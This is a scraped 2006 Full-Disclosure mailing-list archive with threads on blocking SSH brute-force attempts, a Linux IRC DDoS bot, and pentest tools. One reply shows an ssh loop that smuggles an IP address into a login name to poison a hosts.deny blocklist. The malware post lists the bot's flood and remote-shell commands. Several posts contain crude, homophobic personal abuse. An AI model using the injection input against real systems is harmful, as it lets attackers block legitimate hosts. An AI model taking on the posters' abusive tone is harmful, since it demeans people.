[EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Thursday, March 02, 2006 1:48 PM Subject: Re: [Full-disclosure] reduction of brute force login attempts via SSHthrough iptables --hashlimit On 3/1/06, GroundZero Security [EMAIL PROTECTED] wrote: Well i had a few minutes time, so i updated the script a bit. I did not use lastb though, as it wouldnt work (read the manpage.) Anyhow, maybe someone found it usefull so here is v.0.2 : http://www.groundzero-security.com/code/bruteforce-block.sh Any suggestions are welcome, insults and flames can be sent to /dev/null -sk GroundZero Security Research and Software Development http://www.groundzero-security.com Wir widersprechen der Nutzung oder Übermittlung unserer Daten für Werbezwecke oder für die Markt- oder Meinungsforschung (§ 28 Abs. 4 BDSG). pub 1024D/69928CB8 2004-09-27 Stefan Klaas [EMAIL PROTECTED] sub 2048g/2A3C7800 2004-09-27 Key fingerprint = A93E 41F8 7E82 5F2C 3E76 41F1 4BCF 3096 6992 8CB8 -BEGIN PGP PUBLIC KEY BLOCK- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org mQGiBEFX440RBADGTKOgZR9Y9VA/cfNLWTIN/OmXe9l6UZJ6pY8Hqcv6DFE//Kt9 UfQMU470i+I7SvIHZN066Kl4ts4r90sLxXrE4r5VQCLTsJM68cliatrM8MbbZZs+ xf3ldelZrHNvHkXDk4I/n3O56F9M6tZ/S71AIj++raIbFX57fn8Z8NNOnwCgwDr6 LDVP+5N4DML1/+uvXNtoL30D/A/GUXd6lJ8i7MoZMzwKk1uwDsgWwP+Wm0hMwJMr fR/di9K55pGdlGFNO5P2L3qOl2BaC8raNkLcXaweW+bao3P66nzpdtmecsjCMWq2 tQWgu/O7S1FgzlUAKJSOc2Th5PY9Raum8bXnSv4gnHZCKjNskIdrz8WDxCzEoPtZ eCssA/9ydHRvNIPjOTmzjXoE+UbJrB/U//u3dpAsLkzclKeSgjV2eYUgHGcqYn+H cFoubD78yFWqZqYtxfiyjBlItsIn9ls0gAZFKDFHd1XfOLFSa0/NHNpHLxCZGFIA tQ0Gp47VRmTPkWJ7lB505w0XioNs1H/1K1RSp++7+t1SNkBlobQpU3RlZmFuIEts YWFzIDxza0Bncm91bmR6ZXJvLXNlY3VyaXR5LmNvbT6IVwQTEQIAFwUCQVfjjQUL BwoDBAMVAwIDFgIBAheAAAoJEEvPMJZpkoy4AnYAmwTot1PMUty1YoCuMVg6cpr7 HKy1AJ98jyzD365YkIQAEiihXlQJ4zrxBLkCDQRBV+OvEAgAiu75prsTQZdNijtY
Re: [Full-disclosure] reduction of brute force login attempts via SSHthrough iptables --hashlimit
Well i dont want to destroy your happy time where you can feel superior, but if you would read the manpage of lastb you would notice that this approach wont work at all. lastb just shows successfull logins! not all the attempted loginswe discussed that before though, so better pay attention next time. Another thing is that on many systems btmp is not present and thus lastb wouldnt work even if it would show failed logins. NAME last, lastb - show listing of last logged in users SYNOPSIS last [-R] [-num] [ -n num ] [-adiox] [ -f file ] [name...] [tty...] lastb [-R] [-num] [ -n num ] [ -f file ] [-adiox] [name...] [tty...] DESCRIPTION Last searches back through the file /var/log/wtmp (or the file designated by the -f flag) and displays a list of all users logged in (and out) since that file was created. as you can see it only logs logged in users not all those that tried. so your script is useless. - Original Message - From: Gary Leons [EMAIL PROTECTED] To: GroundZero Security [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Sent: Thursday, March 02, 2006 4:43 PM Subject: Re: [Full-disclosure] reduction of brute force login attempts via SSHthrough iptables --hashlimit On 3/2/06, GroundZero Security [EMAIL PROTECTED] wrote: After all it works. There are always more ways to do it, but if its -A1 or -1 really doesnt matter at all, its just you have to be pedantic over it i guess. Yep im not a bash guru maybe,but i really dont care much for optimization on a lame script like this as long as it WORKS and is not insecure. ^^^ HAH. If you really think it sucks sooo much that you cant take it, then before you reply to this mail now, go and optimize it and send your version to FD then you can be happy and feel superior :-) -sk #!/bin/sh for i in `lastb -ai | awk '{print $(NF)}' | sort | uniq -c | sort -n | awk '{if ($1 = 7) print $2}'`; do if ! grep -q sshd: ${i} /etc/hosts.deny; then printf # %s\nsshd: %s\n `date` ${i} /etc/hosts.deny fi done 5 lines, adds hosts with more than 7 failed logins to hosts.deny, run it from cron. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] reduction of brute force login attempts via SSHthrough iptables --hashlimit
ok i may have mad a mistacke i admit it, but you have no right to be so insulting you fucking prick. whatever go send your flames to /dev/null next time. you seem to have too much time on your hands if you can waste your time with idiotic stuff like this. my guess is you do that for your ego. anyhow i have better things to do than waste my time arguing with you. sorry for my mistacke, but it doesnt justify your behaviour at all. I guess once you grow up you will notice that insults wont solve anything. sorry to the list for all this nonsense it should stop now :-) what i originally intended was to help out a little, but i guess its not much appriciated if its not foolproof, so i wont supply any quick scripts anymore. Thanks anyhow to those who provided serious comments. - Original Message - From: Gary Leons [EMAIL PROTECTED] To: GroundZero Security [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Sent: Thursday, March 02, 2006 5:40 PM Subject: Re: [Full-disclosure] reduction of brute force login attempts via SSHthrough iptables --hashlimit On 3/2/06, GroundZero Security [EMAIL PROTECTED] wrote: Well i dont want to destroy your happy time where you can feel superior, but if you would read the manpage of lastb you would notice that this approach wont work at all. lastb just shows successfull logins! not all the attempted loginswe discussed that before though, so better pay attention next time. Holy crap, you must be the dumbest man alive. I really hope nobody has ever hired you for any security related work, if they have, I would advise them to get a second opinion or third party audit of any code provided. If you had scrolled down 20 LINES in the man page, you wold have seen Lastb is the same as last, except that by default it shows a log of the file /var/log/btmp, which contains all the bad login attempts., maybe you have bad eyesight, let me blow that text up for you: BAD LOGIN ATTEMPTS, ok? clear now? good. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] reduction of brute force login attempts via SSH through iptables --hashlimit
Well i had a few minutes time, so i updated the script a bit. I did not use lastb though, as it wouldnt work (read the manpage.) Anyhow, maybe someone found it usefull so here is v.0.2 : http://www.groundzero-security.com/code/bruteforce-block.sh Any suggestions are welcome, insults and flames can be sent to /dev/null -sk GroundZero Security Research and Software Development http://www.groundzero-security.com Wir widersprechen der Nutzung oder Übermittlung unserer Daten für Werbezwecke oder für die Markt- oder Meinungsforschung (§ 28 Abs. 4 BDSG). pub 1024D/69928CB8 2004-09-27 Stefan Klaas [EMAIL PROTECTED] sub 2048g/2A3C7800 2004-09-27 Key fingerprint = A93E 41F8 7E82 5F2C 3E76 41F1 4BCF 3096 6992 8CB8 -BEGIN PGP PUBLIC KEY BLOCK- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org mQGiBEFX440RBADGTKOgZR9Y9VA/cfNLWTIN/OmXe9l6UZJ6pY8Hqcv6DFE//Kt9 UfQMU470i+I7SvIHZN066Kl4ts4r90sLxXrE4r5VQCLTsJM68cliatrM8MbbZZs+ xf3ldelZrHNvHkXDk4I/n3O56F9M6tZ/S71AIj++raIbFX57fn8Z8NNOnwCgwDr6 LDVP+5N4DML1/+uvXNtoL30D/A/GUXd6lJ8i7MoZMzwKk1uwDsgWwP+Wm0hMwJMr fR/di9K55pGdlGFNO5P2L3qOl2BaC8raNkLcXaweW+bao3P66nzpdtmecsjCMWq2 tQWgu/O7S1FgzlUAKJSOc2Th5PY9Raum8bXnSv4gnHZCKjNskIdrz8WDxCzEoPtZ eCssA/9ydHRvNIPjOTmzjXoE+UbJrB/U//u3dpAsLkzclKeSgjV2eYUgHGcqYn+H cFoubD78yFWqZqYtxfiyjBlItsIn9ls0gAZFKDFHd1XfOLFSa0/NHNpHLxCZGFIA tQ0Gp47VRmTPkWJ7lB505w0XioNs1H/1K1RSp++7+t1SNkBlobQpU3RlZmFuIEts YWFzIDxza0Bncm91bmR6ZXJvLXNlY3VyaXR5LmNvbT6IVwQTEQIAFwUCQVfjjQUL BwoDBAMVAwIDFgIBAheAAAoJEEvPMJZpkoy4AnYAmwTot1PMUty1YoCuMVg6cpr7 HKy1AJ98jyzD365YkIQAEiihXlQJ4zrxBLkCDQRBV+OvEAgAiu75prsTQZdNijtY eMQhl4tEL8qi8JOFluYGnvPYjDzU0PY9E4mNx/w2BgYcM3lTVzSmaiLEJ1AzeOHn w+pLDWsorRZuVI9q3+ExW3s2yFX4ppdHAVBMuYsQyVJRkbobCkcwTbUYXr23pKzh D8WRAJ991k2lNcQHxMgixAN+55XBFLhwLB0Yz7XmhFYLid5dLxdPllLIV3ZHDeY0 SEqMSpw96+gV0QpX7YH9U2VBr3Wz7Ss6qNZkcgHQw1xmk6Yy24QnT4a9oZD06Yjr cCocXnyI/YLW1wXo/6Hh44UH3b9mKUX6eh8ybn7QCnZDG7AdxbglLiPTkdcx0YoT NANZBwADBwf8CrjVKiXSzyhUsdH1es1KQCZ/zH6PvPzdxqYuGuVVMzgaJeeOMS2G 4rLfw2ILahAS0fjng6zX2c1ndPVJ6oAq3IygWsqJH6Uh23NmKTlyx3KtSgyW7YsB Rn/4wobuojArTHTl+X3U4JZTUEb9E4osB9bFjdsgXcxNSwXghQMh1x5eS5/fcjLd tACNq0x2/zh8zTJFHK+oNCLY2+iBjTUn7K03rEhQo6HqbPYwyc3LUCwBuFHFDVWp bZqa4knO0H5BBmbiI09kaVPOs0qRLXCAf1oy9PxK5ZBJ4WfQAnMAU+TuNrTuW2SU NMh92TCELdDpl/pMDbbBGeJdMvXZmY99HIhGBBgRAgAGBQJBV+OvAAoJEEvPMJZp koy4p1QAoIaYw3VxA0/mixUsMO4R13sXIL/pAJ9zodR+A9+bLqCRlVusG8JhItv1 Ow== =E0o1 -END PGP PUBLIC KEY BLOCK- Diese E-Mail kann vertrauliche Informationen enthalten. Wenn Sie nicht der richtige Adressat sind oder diese E-Mail irrtümlich erhalten haben, informieren Sie bitte sofort den Absender und vernichten Sie diese E-Mail. Das unerlaubte Kopieren sowie die unbefugte Weitergabe dieser E-Mail oder von Teilen dieser E-Mail ist nicht gestattet. This E-mail might contain confidential information. If you are not the right addressee or you have recived this Mail in error, please inform the Sender as soon as possible and delete this E-Mail immediately. You are not allowed to make any copies or relay this E-Mail. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] reduction of brute force login attempts via SSH through iptables --hashlimit
Hello, i made a small bash script last year to block those bruteforce attempts automatically via the firewall. In case someone is interested, i released it on our website. Someone may have a use for it :-) http://www.groundzero-security.com/code/bruteforce-block.sh Have a nice day everyone! -sk GroundZero Security Research and Software Development http://www.groundzero-security.com Wir widersprechen der Nutzung oder Übermittlung unserer Daten für Werbezwecke oder für die Markt- oder Meinungsforschung (§ 28 Abs. 4 BDSG). pub 1024D/69928CB8 2004-09-27 Stefan Klaas [EMAIL PROTECTED] sub 2048g/2A3C7800 2004-09-27 Key fingerprint = A93E 41F8 7E82 5F2C 3E76 41F1 4BCF 3096 6992 8CB8 -BEGIN PGP PUBLIC KEY BLOCK- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org mQGiBEFX440RBADGTKOgZR9Y9VA/cfNLWTIN/OmXe9l6UZJ6pY8Hqcv6DFE//Kt9 UfQMU470i+I7SvIHZN066Kl4ts4r90sLxXrE4r5VQCLTsJM68cliatrM8MbbZZs+ xf3ldelZrHNvHkXDk4I/n3O56F9M6tZ/S71AIj++raIbFX57fn8Z8NNOnwCgwDr6 LDVP+5N4DML1/+uvXNtoL30D/A/GUXd6lJ8i7MoZMzwKk1uwDsgWwP+Wm0hMwJMr fR/di9K55pGdlGFNO5P2L3qOl2BaC8raNkLcXaweW+bao3P66nzpdtmecsjCMWq2 tQWgu/O7S1FgzlUAKJSOc2Th5PY9Raum8bXnSv4gnHZCKjNskIdrz8WDxCzEoPtZ eCssA/9ydHRvNIPjOTmzjXoE+UbJrB/U//u3dpAsLkzclKeSgjV2eYUgHGcqYn+H cFoubD78yFWqZqYtxfiyjBlItsIn9ls0gAZFKDFHd1XfOLFSa0/NHNpHLxCZGFIA tQ0Gp47VRmTPkWJ7lB505w0XioNs1H/1K1RSp++7+t1SNkBlobQpU3RlZmFuIEts YWFzIDxza0Bncm91bmR6ZXJvLXNlY3VyaXR5LmNvbT6IVwQTEQIAFwUCQVfjjQUL BwoDBAMVAwIDFgIBAheAAAoJEEvPMJZpkoy4AnYAmwTot1PMUty1YoCuMVg6cpr7 HKy1AJ98jyzD365YkIQAEiihXlQJ4zrxBLkCDQRBV+OvEAgAiu75prsTQZdNijtY eMQhl4tEL8qi8JOFluYGnvPYjDzU0PY9E4mNx/w2BgYcM3lTVzSmaiLEJ1AzeOHn w+pLDWsorRZuVI9q3+ExW3s2yFX4ppdHAVBMuYsQyVJRkbobCkcwTbUYXr23pKzh D8WRAJ991k2lNcQHxMgixAN+55XBFLhwLB0Yz7XmhFYLid5dLxdPllLIV3ZHDeY0 SEqMSpw96+gV0QpX7YH9U2VBr3Wz7Ss6qNZkcgHQw1xmk6Yy24QnT4a9oZD06Yjr cCocXnyI/YLW1wXo/6Hh44UH3b9mKUX6eh8ybn7QCnZDG7AdxbglLiPTkdcx0YoT NANZBwADBwf8CrjVKiXSzyhUsdH1es1KQCZ/zH6PvPzdxqYuGuVVMzgaJeeOMS2G 4rLfw2ILahAS0fjng6zX2c1ndPVJ6oAq3IygWsqJH6Uh23NmKTlyx3KtSgyW7YsB Rn/4wobuojArTHTl+X3U4JZTUEb9E4osB9bFjdsgXcxNSwXghQMh1x5eS5/fcjLd tACNq0x2/zh8zTJFHK+oNCLY2+iBjTUn7K03rEhQo6HqbPYwyc3LUCwBuFHFDVWp bZqa4knO0H5BBmbiI09kaVPOs0qRLXCAf1oy9PxK5ZBJ4WfQAnMAU+TuNrTuW2SU NMh92TCELdDpl/pMDbbBGeJdMvXZmY99HIhGBBgRAgAGBQJBV+OvAAoJEEvPMJZp koy4p1QAoIaYw3VxA0/mixUsMO4R13sXIL/pAJ9zodR+A9+bLqCRlVusG8JhItv1 Ow== =E0o1 -END PGP PUBLIC KEY BLOCK- Diese E-Mail kann vertrauliche Informationen enthalten. Wenn Sie nicht der richtige Adressat sind oder diese E-Mail irrtümlich erhalten haben, informieren Sie bitte sofort den Absender und vernichten Sie diese E-Mail. Das unerlaubte Kopieren sowie die unbefugte Weitergabe dieser E-Mail oder von Teilen dieser E-Mail ist nicht gestattet. This E-mail might contain confidential information. If you are not the right addressee or you have recived this Mail in error, please inform the Sender as soon as possible and delete this E-Mail immediately. You are not allowed to make any copies or relay this E-Mail. - Original Message - From: Jay Libove [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Tuesday, February 28, 2006 2:23 AM Subject: [Full-disclosure] reduction of brute force login attempts via SSH through iptables --hashlimit Quite some time back, I posted a question here about brute force login attempts through SSH which had recently become a noticeable annoyance. There was some discussion here on the list, someone suggested using hashlimit, and I think the issue of brute force attempts through SSH has become just one more part of the background noise of the Internet. I finally got back around to looking at this on my system, and I figured out why my first attempts at using the hashlimit functionality in iptables had not worked. Hopefully late is better than never, so I present it here to anyone else who was as stupid and/or lazy as I was :) so that it took me this long to get back to work on it and get it right. Here is an iptables command to allow inbound SSH with a quite low limit on the number of connections which may arrive from a specific IP address in a short period of time. Combined with the default setting of OpenSSH which drops a connection after just a few failed login attempts, this has reduced the number of failed logins I am seeing in my nightly logwatch output from thousands to about ten per day. Since this use of hashlimit filters on source IP address, it does not create a denial of service against legitimate SSH connections, unless someone spoofs a very large range of source addresses and can somehow get those connections to actually open instead of just consume partly open TCP sessions. In such a case, other defenses are needed anyway. # iptables --table filter -A INPUT --protocol tcp --source 0/0 \ --destination-port ssh -m hashlimit --hashlimit 2/minute \ --hashlimit-burst 3 --hashlimit-mode srcip --hashlimit-name ssh \ -m state --state NEW --jump ACCEPT
Re: [Full-disclosure] reduction of brute force login attempts via SSH through iptables --hashlimit
well i somehow felt someone will be pedantic over it. its a quick script originally thrown together in a few minutes for personal use and wasn't really intended to be released, i just thought it may help someone. besides that this is ment to stop those bruteforce attempts which *all* have more than enough users without spaces they try. or do you know anyone that does ssh bruteforce by hand? you may be able to add a bogus ip (wow your l33t), but it wouldnt be of any use so... instead of beeing a smartass why dont you provide a better solution for the people who are annoyed by those bruteforce attacks? - Original Message - From: Gary Leons [EMAIL PROTECTED] To: GroundZero Security [EMAIL PROTECTED] Cc: Jay Libove [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Tuesday, February 28, 2006 10:52 PM Subject: Re: [Full-disclosure] reduction of brute force login attempts via SSH through iptables --hashlimit On 2/28/06, GroundZero Security [EMAIL PROTECTED] wrote: Hello, i made a small bash script last year to block those bruteforce attempts automatically via the firewall. In case someone is interested, i released it on our website. Someone may have a use for it :-) http://www.groundzero-security.com/code/bruteforce-block.sh Have a nice day everyone! -sk That is remarkably shoddy coding from a security research and software developer. *NEWS FLASH* most platforms allow login names to contain spaces. $ for ((i=0;i5;i++)); do ssh -l j00 ar3 l4m3 222.173.190.239 idiot.running.this.script.com done And i just added an arbitrary address to your firewall, fun! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [EMAIL PROTECTED] back RE: [Full-disclosure] Latest Googlevulnerability threatens the world
if it would at least be funny, but its just a lame approach. i enjoy those fun advisories, but thisone clearly lacks creativity... -sk - Original Message - From: [EMAIL PROTECTED] To: [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Wednesday, February 22, 2006 9:10 PM Subject: [EMAIL PROTECTED] back RE: [Full-disclosure] Latest Googlevulnerability threatens the world [EMAIL PROTECTED] wrote: Google Icemaker improper ice dispensing vulnerability Do not worry. We are all aware of your gayness and in the past you have proved that you are fully profficient in being _obnoxious_, but this is not much good if you can't do it in style. I can forward your naked photos to gaysex.com as your b-day gift. recent 'obnoxious' cock sucking show - http://lists.grok.org.uk/pipermail/full- disclosure/attachments/20051224/7be9b262/attachment.html http://lists.grok.org.uk/pipermail/full- disclosure/attachments/20051225/8bd10708/attachment.html /john -Original Message- From: [EMAIL PROTECTED] [mailto:full- [EMAIL PROTECTED] On Behalf Of [EMAIL PROTECTED] Sent: Thursday, February 23, 2006 12:14 AM To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Latest Google vulnerability threatens the world Google Icemaker improper ice dispensing vulnerability = Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] new linux malware
oh my god this is a stone old DoS irc bot. you can find the source on packetstorm :P its by no means new maybe it has been modified by some kid that changed the printf()'s, but this is no news at all. -sk http://www.groundzero-security.com - Original Message - From: Gadi Evron [EMAIL PROTECTED] To: bugtraq@securityfocus.com Cc: full-disclosure@lists.grok.org.uk Sent: Saturday, February 18, 2006 11:40 PM Subject: [Full-disclosure] new linux malware Today, we received a notification about a new Linux malware ItW (In the Wild). Chas Tomlin (http://www.ecs.soton.ac.uk/~cet/) provided Shadowserver (http://www.shadowserver.org/) and Nicholas Alright who notified the relevant operational communities, with the information on the binaries. He captured them with squil (http://sguil.sourceforge.net/). Chas is working with Shadowserver to identify better ways to trackdown/takedown botnets. *The credit should go to him and Shadowserver*. Shadowserver has been a responsible and essential part of recent Internet security activities. As anti virus vendors have been notified will soon do a write-up on it, I see no reason not to publicize it here. MD5: c2576aeff0fd9267b6cc3a7e1089e05d ~/samples/derfiq e9a2b13fe02d013cc5e11ee586d11c38 ~/samples/session We are not quite sure as of yet exactly what this does, it can be a Linux virus, a Linux Trojan horse, a Linux worm... we are not even sure if the checksums above are useful at all. We hope to know more soon and we will update as we do. There are some interesting strings to be noted: NOTICE %s :TSUNAMI target secs = Special packeter that wont be blocked by most firewalls NOTICE %s :PAN target port secs = An advanced syn flooder that will kill most network drivers NOTICE %s :UDP target port secs = A udp flooder NOTICE %s :UNKNOWN target secs = Another non-spoof udp flooder NOTICE %s :NICK nick = Changes the nick of the client NOTICE %s :SERVER server = Changes servers NOTICE %s :GETSPOOFS= Gets the current spoofing NOTICE %s :SPOOFS subnet = Changes spoofing to a subnet NOTICE %s :DISABLE = Disables all packeting from this client NOTICE %s :ENABLE = Enables all packeting from this client NOTICE %s :KILL = Kills the client NOTICE %s :GET http address save as = Downloads a file off the web and saves it onto the hd NOTICE %s :VERSION = Requests version of client NOTICE %s :KILLALL = Kills all current packeting NOTICE %s :HELP = Displays this NOTICE %s :IRC command= Sends this command to the server NOTICE %s :SH command = Executes a command 'session', current detection: AntiVir 6.33.1.50/20060218 found [BDS/Katien.R] Avast 4.6.695.0/20060216 found nothing AVG 718/20060217 found nothing Avira 6.33.1.50/20060218 found [BDS/Katien.R] BitDefender 7.2/20060218 found nothing CAT-QuickHeal 8.00/20060216 found nothing ClamAV devel-20060126/20060217 found nothing DrWeb 4.33/20060218 found nothing eTrust-InoculateIT 23.71.80/20060218 found nothing eTrust-Vet 12.4.2086/20060217 found nothing Ewido 3.5/20060218 found nothing Fortinet 2.69.0.0/20060218 found nothing F-Prot 3.16c/20060217 found nothing Ikarus 0.2.59.0/20060217 found [Backdoor.Linux.Keitan.C] Kaspersky 4.0.2.24/20060218 found [Backdoor.Linux.Keitan.c] McAfee 4700/20060217 found [Linux/DDoS-Kaiten] NOD32v2 1.1413/20060217 found nothing Norman 5.70.10/20060217 found nothing Panda 9.0.0.4/20060218 found nothing Sophos 4.02.0/20060218 found nothing Symantec 8.0/20060218 found [Backdoor.Kaitex] TheHacker 5.9.4.098/20060218 found nothing UNA 1.83/20060216 found nothing VBA32 3.10.5/20060217 found nothing 'derfiq' current detection: AntiVir 6.33.1.50/20060218 found [Worm/Linux.Lupper.B] Avast 4.6.695.0/20060216 found nothing AVG 718/20060217 found nothing Avira 6.33.1.50/20060218 found [Worm/Linux.Lupper.B] BitDefender 7.2/20060218 found nothing CAT-QuickHeal 8.00/20060216 found nothing ClamAV devel-20060126/20060217 found nothing DrWeb 4.33/20060218 found nothing eTrust-InoculateIT 23.71.80/20060218 found nothing eTrust-Vet 12.4.2086/20060217 found nothing Ewido 3.5/20060218 found nothing Fortinet 2.69.0.0/20060218 found nothing F-Prot 3.16c/20060217 found nothing Ikarus 0.2.59.0/20060217 found [Net-Worm.Linux.Lupper.B] Kaspersky 4.0.2.24/20060218 found nothing McAfee 4700/20060217 found nothing NOD32v2
Re: [Full-disclosure] new linux malware
you said you are not quiet sure what this is and posted those strings which clearly are from an old irc bot with DoS functionality - Original Message - From: Gadi Evron [EMAIL PROTECTED] To: GroundZero Security [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Sent: Sunday, February 19, 2006 5:46 AM Subject: Re: [Full-disclosure] new linux malware GroundZero Security wrote: oh my god this is a stone old DoS irc bot. you can find the source on packetstorm :P its by no means new maybe it has been modified by some kid that changed the printf()'s, but this is no news at all. Wrong. The first part is the regular PHP worms we see for a while now. Take a second look if you do have the sample. Gadi. -- http://blogs.securiteam.com/ Out of the box is where I live. -- Cara Starbuck Thrace, Battlestar Galactica. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] aix sniffer
to sniff packets ? :P - Original Message - From: xyberpix [EMAIL PROTECTED] To: Zolee [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Sent: Tuesday, February 07, 2006 8:33 PM Subject: Re: [Full-disclosure] aix sniffer -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 My big question is why would you want to do this? xyberpix Blog: http://blogs.securiteam.com On 7 Feb 2006, at 13:37, Zolee wrote: Hi! I want write a tcp packet capture sniffer for aix.(without packet capture library). But the following socket is capure only the udp packets: /The udp capture works fine/ if((sockfd = socket(PF_INET,SOCK_RAW,0)) 0){ perror(Socket:); exit(1); } And I trying this code: socket(PF_INET,SOCK_RAW,IPPROTO_TCP) .. But, it doesnt work. The code is work on linux( a little bit modification). I dont know, what is false. Someone can help me? Ups, Sorry my poor english. I hope you understand me :-) Tanx PZ __ __ Harry Potter és a Félvér Herceg - megjelenik február 10-én. Rendeld meg most! http://www.bookline.hu/control/news?newsid=322affiliate=frehp6kar87 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.1 (Darwin) iD8DBQFD6PYd2VKEoIQBZwkRAs4oAJ9fbCvH8Hq6N5mcC5iwFFHNOf6qCgCgxfeC LlXN/05EwZAW8bHknY1kY/8= =JQ8J -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerability/Penetration Testing Tools
or learn how to do such tests by hand as that is more accurate as any automated tool out there! a penetration test shouldnt be automated it would miss too many bugs i.e. in custom php/cgi scripts. a professional security audit can only be done by hand. period. too many people rip their customers off with cheap automated tests. -sk http://www.groundzero-security.com - Original Message - From: [EMAIL PROTECTED] To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Thursday, January 19, 2006 7:27 PM Subject: Re: [Full-disclosure] Vulnerability/Penetration Testing Tools Madison, See, thats the challenge. I am not looking for a tool that does strict vulnerability assessments. I am looking for a tool that will do an automated vulnerability assessment and then automated attacks against those vulnerabilities. Core Impact has such a tool and it is well worth the money. In fact, I already have that in my to-purchase list. I am now searching for free tools however and haven't found anything. My goal is to identify tools that have a high ROI... free == the higest. Never the less, automation can only be used a limited amount as it reduces quality and accuracy I know this. -Adriel -Original Message- From: Madison, Marc [EMAIL PROTECTED] To: H D Moore [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Wed, 18 Jan 2006 08:02:59 -0600 Subject: RE: [Full-disclosure] Vulnerability/Penetration Testing Tools I've looked at BidiBLAH (enfaces on the BLAH). Their product does nothing more than take the results from Nessus, Metasploit and such, then cram them all together in a easy to understand format for your boss. BidiBLAH IMHO is not a vulnerability assessment tool, rather a reporting tool. If anyone can correct me please do, since at one point I was in contact with BidiBLAH sales asking what I got for $10,000.00 outside Of the reporting? Their answer, well let's just say I'm still waiting. My two cent, Nessus. It's cheap, effective, and probably the most supported network vulnerability assessment tool on the market. H D Moore wrote: Er, woops, misread - you want to scan and automatically exploit systems. This can be easily done with a little scripting and the available open-source tools. SensePost has a project called BiDiBLAH that integrates Google-discovery, a TCP port scanner, Nessus, and Metasploit: - http://www.sensepost.com/research/bidiblah/ The next version of the Metasploit Framework (v3) has support for 'recon' modules that technically you could use to automate this, but it will take some time before this is usable. -HD On Tuesday 17 January 2006 18:04, H D Moore wrote: You should check out the Metasploit Framework: - http://metasploit.com/projects/Framework/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Check Out the new free AIM(R) Mail -- 2 GB of storage and industry-leading spam and email virus protection. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Secure Delete for Windows
from the list charter: Gratuitous advertisement, product placement, or self-promotion is forbidden. Thanks. well i am currently moderated and the moderator let this mail go through, so it seems the mail was ok. send your complains to /dev/null besides of that i am not the onlyone that notifies people of new program releases here. also not everyone posts their source so what is your fucking problem?! as said, just stfu if you dont have to say anything usefull. - Original Message - From: [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Tuesday, January 17, 2006 8:55 AM Subject: Re: [Full-disclosure] Secure Delete for Windows Hi, GroundZero Security wrote: New version of GroundZero Secure Delete which also supports securely wiping of Free Space on a Device, has been released! A free trial can be downloaded here: GTi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Secure Delete for Windows
